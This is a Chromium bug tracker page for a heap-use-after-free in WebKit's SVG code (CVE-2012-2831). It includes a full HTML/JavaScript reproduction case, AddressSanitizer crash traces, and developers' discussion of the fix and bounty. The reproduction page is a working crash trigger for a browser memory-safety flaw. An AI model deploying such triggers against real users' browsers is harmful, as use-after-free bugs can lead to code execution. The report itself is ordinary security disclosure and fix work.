New issue
Advanced search Search tips
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
link

Issue 130356: Heap-use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget

Reported by miau...@gmail.com, May 30 2012

Issue description

VULNERABILITY DETAILS
use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget

VERSION
Chrome Version: dev

Chromium	21.0.1157.0 (Developer Build 139531)
OS	Linux
WebKit	537.1 (@118843)

Operating System: 64bit precise

REPRODUCTION CASE
<html>
  <head>
    <style>
    </style>
    <script>
      onload = function() {
        el0=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)

        document.body.appendChild(document.createTextNode('A'))

        el1=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el1.setAttribute('id','el1')
        el1.appendChild(document.createTextNode('A'))
        document.body.appendChild(el1)

        document.body.appendChild(document.createTextNode('A'))

        el2=document.createElementNS('http://www.w3.org/2000/svg', 'image')
        el2.setAttribute('id','el2')
        el0.appendChild(el2)

        el3=document.createElementNS('http://www.w3.org/2000/svg', 'textPath')
        el3.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el1')
        el2.appendChild(el3)

        el4=document.createElementNS('http://www.w3.org/2000/svg', 'use')
        el4.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el2')
        el0.appendChild(el4)

        el2.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el0')
        document.designMode='on'
        window.getSelection().setBaseAndExtent(el1, 0, el1, 0)
        document.execCommand('ForwardDelete')
        setTimeout("location.reload()", 10)
      }
    </script>
  </head>
  <body>
  </body>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 


==9219== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffed156480 at pc 0x55555bb9c7b9 bp 0x7fffffff6230 sp 0x7fffffff6228
READ of size 8 at 0x7fffed156480 thread T0
    #0 0x55555bb9c7b9 in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget(WebCore::SVGElement*) ???:0
    #1 0x55555bba923e in WebCore::SVGElement::removedFrom(WebCore::ContainerNode*) ???:0
    #2 0x55555bd42d90 in WebCore::SVGStyledElement::removedFrom(WebCore::ContainerNode*) ???:0


0x7fffed156480 is located 0 bytes inside of 392-byte region [0x7fffed156480,0x7fffed156608)
freed by thread T0 here:
    #0 0x55555e5cbd52 in operator delete(void*) ??:0
    #1 0x55555bbb3728 in WebCore::SVGElementInstance::detach() ???:0
    #2 0x55555bbb3246 in WebCore::SVGElementInstance::~SVGElementInstance() ???:0
    #3 0x55555bbb319e in WebCore::SVGElementInstance::~SVGElementInstance() ???:0
 
0392.txt
12.4 KB View Download
0392.html
1.4 KB View Download

Comment 1 by infe...@chromium.org, May 30 2012

Cc: fmalita@chromium.org pdr@chromium.org schenney@chromium.org
Labels: WebKit-SVG

Comment 2 by infe...@chromium.org, May 30 2012

Summary: Heap-use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=53433906

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f9edf9b3c80
Crash State:
  - crash stack -
  WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget
  WebCore::SVGElement::removedFrom
  - free stack -
  WebCore::SVGElementInstance::detach
  WebCore::SVGElementInstance::~SVGElementInstance
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=139300:139395

Minimized Testcase (1.10 Kb): https://cluster-fuzz.appspot.com/download/AMIfv968MsHol1ezUseel0zNe5P-oaASUNtgTePunUuguxHTOK7rPf9Ru4zchHA_0hpVVeJce2QxCiJW1IxrXN6BK8BCTlov6UkFNI1qHHdwJnyzZrlarRIN0PkPXD1t_VQjgZNyu9r1tn7nrmRmBSIbVYU2gxQj5s66LkRBOnQzYdrOG8X1B9c

Comment 3 by infe...@chromium.org, May 30 2012

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit OS-All Mstone-21 SecImpacts-None Stability-AddressSanitizer SecSeverity-High
SVG team, please help to find the regresse

Comment 4 by pdr@chromium.org, Jun 1 2012

https://bugs.webkit.org/show_bug.cgi?id=15799 looks like the most probable regresse

Comment 5 by infe...@chromium.org, Jun 1 2012

Labels: ReleaseBlock-Stable
Status: Available
Thanks Philip. Can you please help to upstream this and poke Rob to fix the regression :)

Comment 6 by pdr@chromium.org, Jun 1 2012

Labels: WebKit-ID-88144
Upstream: https://bugs.webkit.org/show_bug.cgi?id=88144

Comment 7 by palmer@chromium.org, Jun 5 2012

Owner: pdr@chromium.org
According to https://bugs.webkit.org/show_bug.cgi?id=15799, which is the bug pdr believes is the root cause, the bug should be fixed. We now have that fix in our tree; I can't reproduce the crash on Mac dev or canary, but that doesn't necessarily mean it's really fixed. ClusterFuzz hasn't told us that we are happy yet, so maybe the bug persists?

I hate to be presumptuous, but I also hate to have a release-blocker with no owner, so I'm giving this to pdr. Maybe it'll turn out that you don't need to do anything. And if you're not the right person to take it, can you let us know who is best? Thanks! And, sorry. :)

Comment 8 by pdr@chromium.org, Jun 5 2012

This bug is still present, you need to use an ASAN build to hit it though. Re-pinging rbuis to get this fixed, or I'll pick it up myself if he doesn't respond.

Comment 9 by pdr@chromium.org, Jun 6 2012

I'm now on this bug.

Comment 10 by pdr@chromium.org, Jun 12 2012

Small update: I haven't forgotten about this (it's my top issue).

Comment 11 by pdr@chromium.org, Jun 14 2012

Patch up!

Comment 12 by pdr@chromium.org, Jun 14 2012

@Abhishek, to get this in it needs to be in before tomorrow. Can you review this? Pinging Rob on IRC is not working and Niko is offline.

Comment 13 by infe...@chromium.org, Jun 18 2012

Labels: Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/120559. Philip, does this need merging for m20 ? that function looked old, it might be that some new code just helped to trigger this.

Comment 14 by pdr@chromium.org, Jun 18 2012

I think this does need merging. http://trac.webkit.org/changeset/118609 introduced the textPath regression, but http://trac.webkit.org/changeset/107067 is the real culprit which introduced this new resource handling model. There is almost certainly the same security bug in feImageElement.

Comment 15 by infe...@chromium.org, Jun 18 2012

Labels: -Mstone-21 -SecImpacts-None Mstone-20 SecImpacts-Stable SecImpacts-Beta
Perfect.

Comment 16 by scarybea...@gmail.com, Jun 19 2012

Labels: -Restrict-View-SecurityTeam -Merge-Approved Restrict-View-SecurityNotify Merge-Merged
M20: http://trac.webkit.org/changeset/120762

Comment 17 by scarybea...@gmail.com, Jun 19 2012

Labels: reward-topanel

Comment 18 by pdr@chromium.org, Jun 19 2012

Just FYI: This bug also exposed some content model issues in SVG that schenney and I are working on in free time. For instance, you shouldn't be able to have:
<image>
  <textPath/>
</image>
to begin with.

Comment 20 by scarybea...@gmail.com, Jun 22 2012

Labels: -reward-topanel reward-1000 reward-unpaid
$1000

Comment 21 by scarybea...@gmail.com, Jun 25 2012

Labels: CVE-2012-2831

Comment 22 by scarybea...@gmail.com, Jul 9 2012

Labels: -reward-unpaid

Comment 23 by bugdroid1@chromium.org, Oct 13 2012

Project Member
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 24 by jsc...@chromium.org, Dec 20 2012

Status: Fixed

Comment 25 by laforge@google.com, Jan 18 2013

Labels: Restrict-View-EditIssue

Comment 26 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -WebKit-SVG -Mstone-20 -SecImpacts-Stable -Stability-AddressSanitizer -SecSeverity-High -SecImpacts-Beta Cr-Content M-20 Security-Impact-Stable Security-Impact-Beta Cr-Content-SVG Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High

Comment 27 by bugdroid1@chromium.org, Mar 14 2013

Project Member
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue

Comment 28 by scarybea...@gmail.com, Mar 21 2013

Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue

Comment 29 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 30 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 31 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 32 by bugdroid1@chromium.org, Apr 1 2013

Project Member
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 33 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 34 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content-SVG Cr-Blink-SVG

Comment 35 by sheriffbot@chromium.org, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 36 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 37 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 38 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 39 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted

Sign in to add a comment